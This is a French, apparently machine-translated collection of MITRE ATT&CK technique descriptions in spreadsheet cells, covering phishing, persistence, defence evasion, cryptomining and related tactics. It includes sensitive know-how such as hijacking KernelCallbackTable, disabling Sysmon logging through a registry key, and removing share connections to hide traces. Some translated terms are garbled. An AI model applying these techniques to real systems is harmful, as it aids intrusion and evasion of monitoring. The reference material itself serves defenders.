Usurpation des boîtes de dialogue d’identification)
Les adversaires peuvent également imiter les demandes d’authentification logicielle courantes, telles que celles provenant de navigateurs ou de clients de messagerie. Cela peut également être associé à la surveillance de l’activité de l’utilisateur (c’est-à-dire [Découverte des informations du navigateur](https://attack.mitre.org/techniques/T1217) et/ou [Découverte de la fenêtre de l’application](https://attack.mitre.org/techniques/T1010)) pour usurper les invites lorsque les utilisateurs accèdent naturellement à des sites/données sensibles.
https://attack.mitre.org/techniques/T1056/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter, voler ou télécharger des outils logiciels qui peuvent être utilisés lors du ciblage. Les outils peuvent être open source ou fermés, gratuits ou commerciaux. Un outil peut être utilisé à des fins malveillantes par un adversaire, mais (contrairement aux logiciels malveillants) n’a pas été conçu pour être utilisé à ces fins (ex : [PsExec](https://attack.mitre.org/software/S0029)). L’acquisition d’outils peut impliquer l’acquisition de licences de logiciels commerciaux, y compris pour des outils de red teaming tels que [Cobalt Strike](https://attack.mitre.org/software/S0154). Les logiciels commerciaux peuvent être obtenus par l’achat, le vol de licences (ou de copies sous licence du logiciel) ou le piratage de versions d’essai. (Citation : Recorded Future Beacon 2019)
Les adversaires peuvent obtenir des outils pour soutenir leurs opérations, y compris pour soutenir l’exécution de comportements post-compromission. En plus de télécharger ou d’acheter librement des logiciels, les adversaires peuvent voler des logiciels et/ou des licences de logiciels à des entités tierces (y compris d’autres adversaires).
https://attack.mitre.org/techniques/T1588/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’exfiltrer des données via un périphérique physique connecté par USB. Dans certaines circonstances, telles qu’une compromission de réseau isolé, l’exfiltration peut se produire via un périphérique USB introduit par un utilisateur. Le périphérique USB peut être utilisé comme point d’exfiltration final ou pour passer d’un système à un autre.
https://attack.mitre.org/techniques/T1052/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de la &lt;code&gt;KernelCallbackTable&lt;/code&gt; d’un processus pour détourner son flux d’exécution afin d’exécuter leurs propres charges utiles. (Citation : Lazarus APT, janvier 2022)(Citation : FinFisher exposé) La &lt;code&gt;KernelCallbackTable&lt;/code&gt; se trouve dans le bloc d’environnement de processus (PEB) et est initialisée à un ensemble de fonctions graphiques disponibles pour un processus GUI une fois &lt;code&gt;user32.dll&lt;/code&gt; chargé. (Citation : Injection de processus Windows KernelCallbackTable)
Un adversaire peut détourner le flux d’exécution d’un processus à l’aide de &lt;code&gt;KernelCallbackTable&lt;/code&gt; en remplaçant une fonction de rappel d’origine par une charge utile malveillante. La modification des fonctions de rappel peut être réalisée de différentes manières en impliquant des comportements connexes tels que [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) ou [Process Injection](https://attack.mitre.org/techniques/T1055) dans un autre processus.
Un pointeur vers l’adresse mémoire de la &lt;code&gt;KernelCallbackTable&lt;/code&gt; peut être obtenu en localisant le PEB (ex : via un appel à la fonction &lt;code&gt;NtQueryInformationProcess()&lt;/code&gt; [Native API](https://attack.mitre.org/techniques/T1106)). (Citation : NtQueryInformationProcess) Une fois le pointeur localisé, la &lt;code&gt;KernelCallbackTable&lt;/code&gt; peut être dupliquée et une fonction de la table (par exemple, &lt;code&gt;fnCOPYDATA&lt;/code&gt;) définie à l’adresse d’une charge utile malveillante (ex : via &lt;code&gt;WriteProcessMemory()&lt;/code&gt;). Le PEB est alors mis à jour avec la nouvelle adresse de la table. Une fois que la fonction falsifiée est appelée, la charge utile malveillante est déclenchée. (Citation : Lazarus APT, janvier 2022)
La fonction falsifiée est généralement appelée à l’aide d’un message Windows. Une fois le processus détourné et le code malveillant exécuté, la &lt;code&gt;KernelCallbackTable&lt;/code&gt; peut également être restaurée à son état d’origine par le reste de la charge utile malveillante. (Citation : Lazarus APT, janvier 2022) L’utilisation de &lt;code&gt;KernelCallbackTable&lt;/code&gt; pour détourner le flux d’exécution peut échapper à la détection des produits de sécurité, car l’exécution peut être masquée sous un processus légitime.
https://attack.mitre.org/techniques/T1574/013</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher et recueillir des informations sur les victimes à partir de sources fermées (par exemple, rémunérées, privées ou non librement accessibles) qui peuvent être utilisées lors du ciblage. Des informations sur les victimes peuvent être disponibles à l’achat auprès de sources et de bases de données privées réputées, telles que des abonnements payants à des flux de données techniques/de renseignement sur les menaces. Les adversaires peuvent également acheter des informations auprès de sources moins fiables, telles que le dark web ou les marchés noirs de la cybercriminalité. (Citation : Données de vente ZDNET)
Les adversaires peuvent effectuer des recherches dans différentes bases de données fermées en fonction des informations qu’ils cherchent à recueillir. Les informations provenant de ces sources peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Phishing pour obtenir de l’information](https://attack.mitre.org/techniques/T1598) ou [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établissement de ressources opérationnelles (ex : [Développer des capacités](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacités](https://attack.mitre.org/techniques/T1588)), et/ou d’accès initial (ex : [Externe à distance Services](https://attack.mitre.org/techniques/T1133) ou [Comptes valides](https://attack.mitre.org/techniques/T1078)).
https://attack.mitre.org/techniques/T1597</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des minuteurs systemd pour planifier des tâches en vue de l’exécution initiale ou récurrente de code malveillant. Les timers systemd sont des fichiers unitaires avec l’extension &lt;code&gt;de fichier .timer&lt;/code&gt; qui contrôlent les services. Les minuteries peuvent être configurées pour s’exécuter sur un événement de calendrier ou après une période de temps par rapport à un point de départ. Ils peuvent être utilisés comme alternative à [Cron](https://attack.mitre.org/techniques/T1053/003) dans les environnements Linux. (Citation : archlinux Systemd Timers août 2020) Les minuteries systemd peuvent être activées à distance via l’utilitaire de ligne de commande &lt;code&gt;systemctl&lt;/code&gt;, qui fonctionne via [SSH](https://attack.mitre.org/techniques/T1021/004). (Citation : Télécommande systemd)
Chaque fichier &lt;code&gt;.timer&lt;/code&gt; doit avoir un fichier &lt;code&gt;.service&lt;/code&gt; correspondant portant le même nom, par exemple, &lt;code&gt;example.timer&lt;/code&gt; et &lt;code&gt;example.service&lt;/code&gt;. Les fichiers &lt;code&gt;.service&lt;/code&gt; sont des fichiers unitaires [Systemd Service](https://attack.mitre.org/techniques/T1543/002) qui sont gérés par le gestionnaire de système et de service systemd. (Citation : Linux man-pages : systemd janvier 2014) Les minuteries privilégiées sont écrites dans &lt;code&gt;/etc/systemd/system/&lt;/code&gt; et &lt;code&gt;/usr/lib/systemd/system,&lt;/code&gt; tandis que le niveau utilisateur est écrit dans &lt;code&gt;~/.config/systemd/user/.&lt;/code&gt;
Un adversaire peut utiliser les minuteries systemd pour exécuter du code malveillant au démarrage du système ou de manière programmée pour la persistance. (Citation : Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation : gist Arch package compromise 10JUL2018)(Citation : acroread package compromis Arch Linux Mail 8JUL2018) Les minuteurs installés à l’aide de chemins privilégiés peuvent être utilisés pour maintenir la persistance au niveau racine. Les adversaires peuvent également installer des minuteries au niveau de l’utilisateur pour obtenir une persistance au niveau de l’utilisateur. (Citation : Falcon Sandbox smp : 28553b3a9d)
https://attack.mitre.org/techniques/T1053/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent envoyer des messages d’hameçonnage pour accéder aux systèmes des victimes. Toutes les formes d’hameçonnage sont transmises par voie électronique. Le phishing peut être ciblé, ce que l’on appelle le spearphishing. Dans le spearphishing, une personne, une entreprise ou un secteur spécifique sera ciblé par l’adversaire. Plus généralement, les adversaires peuvent mener des opérations de phishing non ciblées, par exemple dans le cadre de campagnes massives de spam.
Les adversaires peuvent envoyer aux victimes des e-mails contenant des pièces jointes ou des liens malveillants, généralement pour exécuter du code malveillant sur les systèmes des victimes. L’hameçonnage peut également être effectué par l’intermédiaire de services tiers, comme les plateformes de médias sociaux. L’hameçonnage peut également impliquer des techniques d’ingénierie sociale, telles que se faire passer pour une source fiable, ainsi que des techniques évasives telles que la suppression ou la manipulation d’e-mails ou de métadonnées/en-têtes de comptes compromis utilisés à mauvais escient pour envoyer des messages (par exemple, [Règles de masquage des e-mails](https://attack.mitre.org/techniques/T1564/008)). (Citation : Microsoft OAuth Spam 2022)(Citation : Palo Alto Unit 42 VBA Infostealer 2014) Une autre façon d’y parvenir est de falsifier ou d’usurper l’identité de l’expéditeur, ce qui peut être utilisé pour tromper à la fois le destinataire humain et les outils de sécurité automatisés, ou en incluant la cible visée en tant que partie à un fil de discussion de courrier électronique existant qui comprend des fichiers ou des liens malveillants (c’est-à-dire,  « détournement de fil »). (Citation : phishing-krebs)
Les victimes peuvent également recevoir des messages d’hameçonnage qui leur demandent d’appeler un numéro de téléphone où elles sont dirigées pour visiter une URL malveillante, télécharger des logiciels malveillants, ou installer des outils de gestion à distance accessibles à l’adversaire sur leur ordinateur (c’est-à-dire, [User Execution](https://attack.mitre.org/techniques/T1204)). (Citation : Unit42 Luna Moth)
https://attack.mitre.org/techniques/T1566</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser du moniteur de ROM (ROMMON) en chargeant un micrologiciel non autorisé avec le code de l’adversaire pour fournir un accès persistant et manipuler le comportement de l’appareil qui est difficile à détecter. (Citation : Cisco Synful Knock Evolution)(Citation : Blog Cisco Legacy Device Attacks)
ROMMON est un micrologiciel de périphérique réseau Cisco qui fonctionne comme un chargeur de démarrage, une image de démarrage ou un assistant de démarrage pour initialiser le matériel et les logiciels lorsque la plate-forme est mise sous tension ou réinitialisée. À l’instar de [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), un adversaire peut mettre à niveau l’image ROMMON localement ou à distance (par exemple, via TFTP) avec le code de l’adversaire et redémarrer le périphérique afin d’écraser l’image ROMMON existante. Cela permet aux adversaires de mettre à jour le ROMMON afin d’obtenir une persistance sur un système d’une manière qui peut être difficile à détecter.
https://attack.mitre.org/techniques/T1542/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des fichiers HTML compilés (.chm) pour dissimuler du code malveillant. Les fichiers CHM sont généralement distribués dans le cadre du système d’aide HTML de Microsoft. Les fichiers CHM sont des compilations compressées de divers contenus tels que des documents HTML, des images et des langages de programmation liés aux scripts/Web tels que VBA, JScript, Java et ActiveX. (Citation : Aide HTML de Microsoft, mai 2018) Le contenu CHM est affiché à l’aide des composants sous-jacents du navigateur Internet Explorer (Citation : Microsoft HTML Help ActiveX) chargés par le programme exécutable HTML Help (hh.exe). (Citation : Programme exécutable d’aide Microsoft HTML)
Un fichier CHM personnalisé contenant des charges utiles intégrées peut être remis à une victime, puis déclenché par [User Execution](https://attack.mitre.org/techniques/T1204). L’exécution CHM peut également contourner le contrôle des applications sur les systèmes plus anciens et/ou non corrigés qui ne tiennent pas compte de l’exécution des fichiers binaires via hh.exe. (Citation : MsitPros CHM août 2017) (Référence : Microsoft CVE-2017-8625 août 2017)
https://attack.mitre.org/techniques/T1218/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter les ressources de calcul des systèmes cooptés pour effectuer des tâches gourmandes en ressources, ce qui peut avoir un impact sur la disponibilité du système et/ou des services hébergés. 
L’un des objectifs courants du [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001) est de valider les transactions des réseaux de crypto-monnaie et de gagner de la monnaie virtuelle. Les adversaires peuvent consommer suffisamment de ressources système pour avoir un impact négatif et/ou empêcher les machines affectées de répondre. (Citation : Blog Kaspersky Lazarus Under The Hood 2017) Les serveurs et les systèmes basés sur le cloud sont des cibles courantes en raison du potentiel élevé de ressources disponibles, mais les systèmes de points de terminaison des utilisateurs peuvent également être compromis et utilisés pour le [détournement de calcul](https://attack.mitre.org/techniques/T1496/001) et le minage de cryptomonnaies. (Citation : CloudSploit - Régions AWS inutilisées) Les environnements conteneurisés peuvent également être ciblés en raison de la facilité de déploiement via des API exposées et du potentiel de mise à l’échelle des activités de minage en déployant ou en compromettant plusieurs conteneurs au sein d’un environnement ou d’un cluster. (Citation : Unité 42 Hildegard Malware)(Référence : API Docker exposées de Trend Micro)
De plus, certains logiciels malveillants de minage de crypto-monnaies identifient puis tuent les processus des logiciels malveillants concurrents pour s’assurer qu’ils ne sont pas en concurrence pour les ressources. (Citation : Trend Micro Guerre des mineurs de crypto-monnaies)
https://attack.mitre.org/techniques/T1496/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent supprimer les connexions de partage qui ne sont plus utiles afin de nettoyer les traces de leur fonctionnement. Les connexions Windows shared drive et [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) peuvent être supprimées lorsqu’elles ne sont plus nécessaires. [Net](https://attack.mitre.org/software/S0039) est un exemple d’utilitaire qui peut être utilisé pour supprimer les connexions de partage réseau à l’aide de la commande &lt;code&gt;net use \\system\share /delete&lt;/code&gt;. (Citation : Utilisation de Technet Net)
https://attack.mitre.org/techniques/T1070/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent enchaîner plusieurs proxys pour dissimuler la source du trafic malveillant. En règle générale, un défenseur sera en mesure d’identifier le dernier trafic proxy traversé avant qu’il n’entre dans son réseau ; Le défenseur peut ou non être en mesure d’identifier les proxys précédents avant le proxy de dernier saut. Cette technique rend l’identification de la source d’origine du trafic malveillant encore plus difficile en obligeant le défenseur à suivre le trafic malveillant via plusieurs proxys pour identifier sa source.
Par exemple, les adversaires peuvent construire ou utiliser des réseaux de routage en oignon – tels que le réseau [Tor](https://attack.mitre.org/software/S0183) accessible au public – pour transporter du trafic C2 chiffré à travers une population compromise, permettant ainsi la communication avec n’importe quel appareil au sein du réseau. (Citation : Routage en oignon) Les adversaires peuvent également utiliser des réseaux ORB (Operational Relay Box) composés de serveurs privés virtuels (VPS), d’appareils IoT (Internet des objets), d’appareils intelligents et de routeurs en fin de vie pour masquer leurs opérations. (Citation : ORB Mandiant) 
Dans le cas d’une infrastructure réseau, il est possible pour un adversaire d’exploiter plusieurs périphériques compromis pour créer une chaîne proxy à plusieurs sauts (c’est-à-dire [Network Devices](https://attack.mitre.org/techniques/T1584/008)). En utilisant [Patch System Image](https://attack.mitre.org/techniques/T1601/001) sur les routeurs, les adversaires peuvent ajouter du code personnalisé aux périphériques réseau concernés qui implémentera le routage en oignon entre ces nœuds. Cette méthode dépend de la méthode [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599), qui permet aux adversaires de franchir la limite de réseau protégée du périmètre Internet et d’entrer dans le réseau étendu (WAN) de l’organisation.  Des protocoles tels que ICMP peuvent être utilisés comme moyen de transport.  
De même, les adversaires peuvent abuser de l’infrastructure peer-to-peer (P2P) et orientée blockchain pour mettre en œuvre le routage entre un réseau décentralisé de pairs. (Citation : Cheval de Troie NGLite)
https://attack.mitre.org/techniques/T1090/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des techniques de force brute pour accéder à des comptes lorsque les mots de passe sont inconnus ou lorsque des hachages de mots de passe sont obtenus. (Citation : TrendMicro Pawn Storm décembre 2020) Sans connaître le mot de passe d’un compte ou d’un ensemble de comptes, un adversaire peut systématiquement deviner le mot de passe à l’aide d’un mécanisme répétitif ou itératif. (Citation : Dragos Crashoverride 2018) Les mots de passe par force brute peuvent avoir lieu via une interaction avec un service qui vérifiera la validité de ces informations d’identification ou hors ligne par rapport aux données d’identification précédemment acquises, telles que les hachages de mot de passe.
Le filtrage brutal des informations d’identification peut avoir lieu à différents moments d’une violation. Par exemple, les adversaires peuvent tenter de forcer l’accès à des [comptes valides](https://attack.mitre.org/techniques/T1078) au sein d’un environnement victime en exploitant les connaissances recueillies lors d’autres comportements post-compromission, tels que [vidage des informations d’identification du système d’exploitation](https://attack.mitre.org/techniques/T1003), [Découverte de compte](https://attack.mitre.org/techniques/T1087) ou [Découverte de la politique de mot de passe](https://attack.mitre.org/techniques/T1201). Les adversaires peuvent également combiner une activité de force brute avec des comportements tels que [Services à distance externes](https://attack.mitre.org/techniques/T1133) dans le cadre de l’accès initial.
https://attack.mitre.org/techniques/T1110</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des commandes et des scripts de shell Unix pour l’exécution. Les shells Unix sont la principale invite de commande sur les systèmes Linux et macOS, bien que de nombreuses variantes du shell Unix existent (e.g. sh, bash, zsh, etc.) en fonction du système d’exploitation ou de la distribution spécifique. (Citation : DieNet Bash)(Citation : Apple ZShell) Les shells Unix peuvent contrôler tous les aspects d’un système, certaines commandes nécessitant des privilèges élevés.
Les shells Unix prennent également en charge les scripts qui permettent l’exécution séquentielle de commandes ainsi que d’autres opérations de programmation typiques telles que les conditions et les boucles. Les scripts shell sont couramment utilisés, notamment les tâches longues ou répétitives, ou la nécessité d’exécuter le même ensemble de commandes sur plusieurs systèmes.
Les adversaires peuvent abuser des shells Unix pour exécuter diverses commandes ou charges utiles. Les obus interactifs peuvent être accessibles par des canaux de commande et de contrôle ou lors de mouvements latéraux tels que [SSH](https://attack.mitre.org/techniques/T1021/004). Les adversaires peuvent également exploiter des scripts shell pour fournir et exécuter plusieurs commandes sur les victimes ou dans le cadre de charges utiles utilisées pour la persistance.
https://attack.mitre.org/techniques/T1059/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des formulaires Microsoft Outlook pour obtenir la persistance sur un système compromis. Les formulaires Outlook sont utilisés comme modèles de présentation et de fonctionnalité dans les messages Outlook. Il est possible de créer des formulaires Outlook personnalisés qui exécutent du code lorsqu’un e-mail spécialement conçu est envoyé par un adversaire à l’aide du même formulaire Outlook personnalisé. (Citation : Formulaires Outlook SensePost)
Une fois que des formulaires malveillants ont été ajoutés à la boîte aux lettres de l’utilisateur, ils seront chargés au démarrage d’Outlook. Les formulaires malveillants s’exécutent lorsqu’un adversaire envoie un e-mail spécialement conçu à l’utilisateur. (Citation : Formulaires Outlook SensePost)
https://attack.mitre.org/techniques/T1137/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier et/ou désactiver les outils de sécurité pour éviter la détection éventuelle de leurs logiciels malveillants/outils et activités. Cela peut prendre de nombreuses formes, telles que l’arrêt des processus ou des services logiciels de sécurité, la modification/suppression de clés de registre ou de fichiers de configuration afin que les outils ne fonctionnent pas correctement, ou d’autres méthodes permettant d’interférer avec l’analyse ou la communication d’informations par les outils de sécurité. Les adversaires peuvent également désactiver les mises à jour pour empêcher les derniers correctifs de sécurité d’atteindre les outils sur les systèmes victimes. (Référence : SCADAfence_ransomware)
Les adversaires peuvent également altérer les artefacts déployés et utilisés par les outils de sécurité. Les outils de sécurité peuvent apporter des modifications dynamiques aux composants du système afin de maintenir la visibilité sur des événements spécifiques. Par exemple, les produits de sécurité peuvent charger leurs propres modules et/ou modifier ceux chargés par les processus pour faciliter la collecte de données. À l’instar de [Blocage d’indicateur](https://attack.mitre.org/techniques/T1562/006), les adversaires peuvent décrocher ou modifier ces fonctionnalités ajoutées par des outils (en particulier ceux qui existent dans l’espace utilisateur ou qui sont potentiellement accessibles aux adversaires) pour éviter d’être détectés. (Citation : Appels système OutFlank)(Citation : Appels système MDSec) 
Les adversaires peuvent également se concentrer sur des applications spécifiques telles que Sysmon. Par exemple, les valeurs « Start » et « Enable » dans &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational&lt;/code&gt; peuvent être modifiées pour altérer et potentiellement désactiver la journalisation Sysmon. (Référence : disable_win_evt_logging) 
Sur les périphériques réseau, les adversaires peuvent tenter d’ignorer les vérifications de vérification de signature numérique en modifiant les fichiers de configuration de démarrage et en désactivant efficacement la vérification du micrologiciel qui se produit généralement au démarrage. (Citation : Fortinet zero-day et un logiciel malveillant personnalisé utilisé par un acteur chinois présumé dans une opération d’espionnage)(Référence : Analyse de FG-IR-22-369)
Dans les environnements cloud, les outils désactivés par les adversaires peuvent inclure des agents de surveillance cloud qui rendent compte à des services tels qu’AWS CloudWatch ou Google Cloud Monitor.
De plus, bien que les outils défensifs puissent disposer de mécanismes anti-falsification, les adversaires peuvent abuser d’outils tels que des kits de suppression de rootkits légitimes pour altérer et/ou désactiver ces outils. (Référence : chasing_avaddon_ransomware)(Référence : dharma_ransomware)(Référence : demystifying_ryuk)(Référence : doppelpaymer_crowdstrike) Par exemple, des adversaires ont utilisé des outils tels que GMER pour trouver et arrêter des processus cachés et des logiciels antivirus sur des systèmes infectés. (Référence : demystifying_ryuk)
De plus, les adversaires peuvent exploiter des pilotes légitimes de logiciels antivirus pour accéder à l’espace du noyau (c’est-à-dire [Exploitation pour l’élévation de privilèges](https://attack.mitre.org/techniques/T1068)), ce qui peut conduire à contourner les fonctionnalités anti-falsification. (Référence : avoslocker_ransomware)
https://attack.mitre.org/techniques/T1562/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent insérer, supprimer ou manipuler des données afin d’influencer des résultats externes ou de cacher des activités, menaçant ainsi l’intégrité des données. (Citation : Sygnia Elephant Beetle Jan 2022) En manipulant les données, les adversaires peuvent tenter d’affecter un processus métier, une compréhension organisationnelle ou une prise de décision.
Le type de modification et l’impact qu’elle aura dépendent de l’application et du processus cibles, ainsi que des buts et objectifs de l’adversaire. Pour les systèmes complexes, un adversaire aurait probablement besoin d’une expertise particulière et peut-être d’un accès à des logiciels spécialisés liés au système, ce qui serait généralement obtenu par le biais d’une campagne de collecte d’informations prolongée afin d’avoir l’impact souhaité.
https://attack.mitre.org/techniques/T1565</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des mécanismes de communication interprocessus (IPC) pour l’exécution de code local ou de commandes. IPC est généralement utilisé par les processus pour partager des données, communiquer entre eux ou synchroniser l’exécution. IPC est également couramment utilisé pour éviter des situations telles que les interblocages, qui se produisent lorsque les processus sont bloqués dans un modèle d’attente cyclique. 
Les adversaires peuvent abuser de l’IPC pour exécuter du code ou des commandes arbitraires. Les mécanismes IPC peuvent différer selon le système d’exploitation, mais existent généralement sous une forme accessible via des langages de programmation/bibliothèques ou des interfaces natives telles que Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) ou [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Les environnements Linux prennent en charge plusieurs mécanismes IPC différents, dont deux sont des sockets et des pipes. (Citation : Linux IPC) Les moyens d’exécution de niveau supérieur, tels que ceux des [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), peuvent également tirer parti des mécanismes IPC sous-jacents. Les adversaires peuvent également utiliser des [Services à distance](https://attack.mitre.org/techniques/T1021) tels que [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) pour faciliter l’exécution à distance de l’IPC. (Référence : Fireeye Hunting COM juin 2019)
https://attack.mitre.org/techniques/T1559</t>
  </si>
  <si>
    <t>Les adversaires peuvent obscurcir le trafic de commande et de contrôle pour le rendre plus difficile à détecter. (Citation : Campagne Bitdefender FunnyDream novembre 2020) Les communications de commande et de contrôle (C2) sont cachées (mais pas nécessairement chiffrées) dans le but de rendre le contenu plus difficile à découvrir ou à déchiffrer, de rendre la communication moins visible et de cacher la vue des commandes. Cela englobe de nombreuses méthodes, telles que l’ajout de données indésirables au trafic de protocole, l’utilisation de la stéganographie ou l’usurpation d’identité de protocoles légitimes.
https://attack.mitre.org/techniques/T1001</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des partages réseau sur des ordinateurs qu’ils ont compromis pour trouver des fichiers d’intérêt. Les données sensibles peuvent être collectées à partir de systèmes distants via des lecteurs réseau partagés (répertoire partagé de l’hôte, serveur de fichiers réseau, etc.) accessibles à partir du système actuel avant l’exfiltration. Des shells de commande interactifs peuvent être utilisés, et des fonctionnalités communes à [cmd](https://attack.mitre.org/software/S0106) peuvent être utilisées pour collecter des informations.
https://attack.mitre.org/techniques/T1039</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre l’accès aux services Web tiers qui peuvent être utilisés lors du ciblage. Il existe une variété de sites Web populaires pour que les utilisateurs légitimes puissent s’inscrire à des services Web, tels que GitHub, Twitter, Dropbox, Google, SendGrid, etc. Les adversaires peuvent tenter de s’approprier l’accès d’un utilisateur légitime à un service Web et d’utiliser ce service Web comme infrastructure à l’appui des cyberopérations. Ces services Web peuvent faire l’objet d’une utilisation abusive au cours des étapes ultérieures du cycle de vie de l’adversaire, par exemple lors de la commande et du contrôle ([Service Web](https://attack.mitre.org/techniques/T1102)), [Exfiltration sur le service Web](https://attack.mitre.org/techniques/T1567) ou [Phishing](https://attack.mitre.org/techniques/T1566). (Citation : Recorded Future Turla Infra 2020) L’utilisation de services courants, tels que ceux proposés par Google ou Twitter, permet aux adversaires de se cacher plus facilement dans le bruit attendu. En utilisant un service Web, en particulier lorsque l’accès est volé à des utilisateurs légitimes, les adversaires peuvent rendre difficile le lien physique entre les opérations et ceux-ci. De plus, l’exploitation de services de messagerie Web compromis peut permettre aux adversaires de tirer parti de la confiance associée aux domaines légitimes.
https://attack.mitre.org/techniques/T1584/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent apporter des modifications au système d’exploitation des périphériques réseau intégrés afin d’affaiblir les défenses et de se fournir de nouvelles capacités.  Sur ces appareils, les systèmes d’exploitation sont généralement monolithiques et la plupart des fonctionnalités et des capacités de l’appareil sont contenues dans un seul fichier.
Pour changer de système d’exploitation, l’adversaire n’a généralement besoin que d’affecter ce fichier, en le remplaçant ou en le modifiant.  Cela peut être effectué en direct en mémoire pendant l’exécution du système pour un effet immédiat, ou en stockage pour implémenter la modification au prochain démarrage du périphérique réseau.
https://attack.mitre.org/techniques/T1601</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant la façon dont les systèmes d’exploitation exécutent les programmes. Le détournement du flux d’exécution peut être à des fins de persistance, car cette exécution piratée peut se reproduire au fil du temps. Les adversaires peuvent également utiliser ces mécanismes pour élever des privilèges ou contourner des défenses, telles que le contrôle des applications ou d’autres restrictions d’exécution.
Il existe de nombreuses façons pour un adversaire de détourner le flux d’exécution, notamment en manipulant la façon dont le système d’exploitation localise les programmes à exécuter. La façon dont le système d’exploitation localise les bibliothèques à utiliser par un programme peut également être interceptée. Les emplacements où le système d’exploitation recherche des programmes/ressources, tels que les répertoires de fichiers et, dans le cas de Windows, le registre, peuvent également être empoisonnés pour inclure des charges utiles malveillantes.
https://attack.mitre.org/techniques/T1574</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des commandes et des scripts Lua pour l’exécution. Lua est un langage de script et de programmation multiplateforme principalement conçu pour une utilisation intégrée dans des applications. Lua peut être exécuté sur la ligne de commande (via l’interpréteur lua autonome), via des scripts (&lt;code&gt;.lua&lt;/code&gt;) ou à partir de programmes embarqués dans Lua (via la &lt;code&gt;struct lua_State&lt;/code&gt;). (Citation : page principale de Lua)(Citation : État de Lua)
Les scripts Lua peuvent être exécutés par des adversaires à des fins malveillantes. Les adversaires peuvent incorporer, abuser ou remplacer des interpréteurs Lua existants pour permettre l’exécution de commandes Lua malveillantes au moment de l’exécution. (Citation : PoetRat Lua)(Citation : Lua Proofpoint Sunseed)(Citation : Cyphort EvilBunny)(Citation : Kaspersky Lua)
https://attack.mitre.org/techniques/T1059/011</t>
  </si>
  <si>
    <t>Les adversaires peuvent supprimer des indicateurs d’outils s’ils pensent que leur outil malveillant a été détecté, mis en quarantaine ou autrement restreint. Ils peuvent modifier l’outil en supprimant l’indicateur et en utilisant la version mise à jour qui n’est plus détectée par les systèmes défensifs de la cible ou les cibles ultérieures qui peuvent utiliser des systèmes similaires.
Un bon exemple de cela est lorsqu’un logiciel malveillant est détecté avec une signature de fichier et mis en quarantaine par un logiciel antivirus. Un adversaire qui peut déterminer que le programme malveillant a été mis en quarantaine en raison de sa signature de fichier peut modifier le fichier pour éviter explicitement cette signature, puis réutiliser le programme malveillant.
https://attack.mitre.org/techniques/T1027/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent s’appuyer sur l’exécution d’une image malveillante par un utilisateur pour faciliter l’exécution. Les images Amazon Web Services (AWS), Amazon Machine Images (AMI), Google Cloud Platform (GCP) et Azure Images, ainsi que les environnements d’exécution de conteneurs populaires tels que Docker, peuvent être dérobés. Les images dérobées peuvent être téléchargées dans un référentiel public via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), et les utilisateurs peuvent ensuite télécharger et déployer une instance ou un conteneur à partir de l’image sans se rendre compte que l’image est malveillante, contournant ainsi les techniques qui permettent spécifiquement d’obtenir l’accès initial. Cela peut conduire à l’exécution d’un code malveillant, tel qu’un code qui exécute le minage de cryptomonnaies, dans l’instance ou le conteneur. (Citation : AMI malveillants Summit Route)
Les adversaires peuvent également nommer les images d’une certaine manière pour augmenter le risque que les utilisateurs déploient par erreur une instance ou un conteneur à partir de l’image (ex : [Correspondre au nom ou à l’emplacement légitime](https://attack.mitre.org/techniques/T1036/005)). (Citation : Aqua Security Cloud Native Threat Report juin 2021)
https://attack.mitre.org/techniques/T1204/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer ou modifier des outils de gestion de conteneurs ou de clusters de conteneurs qui s’exécutent en tant que démons, agents ou services sur des hôtes individuels. Il s’agit notamment de logiciels de création et de gestion de conteneurs individuels, tels que Docker et Podman, ainsi que d’agents de niveau nœud de cluster de conteneurs tels que kubelet. En modifiant ces services, un adversaire peut être en mesure de persister ou d’élever ses privilèges sur un hôte.
Par exemple, en utilisant la commande 'docker run' ou 'podman run' avec la directive 'restart=always', un conteneur peut être configuré pour redémarrer de manière persistante sur l’hôte. (Citation : AquaSec TeamTNT 2023) Un utilisateur ayant accès à la commande docker (rootful) peut également être en mesure d’élever ses privilèges sur l’hôte. (Citation : go awayBins Docker)
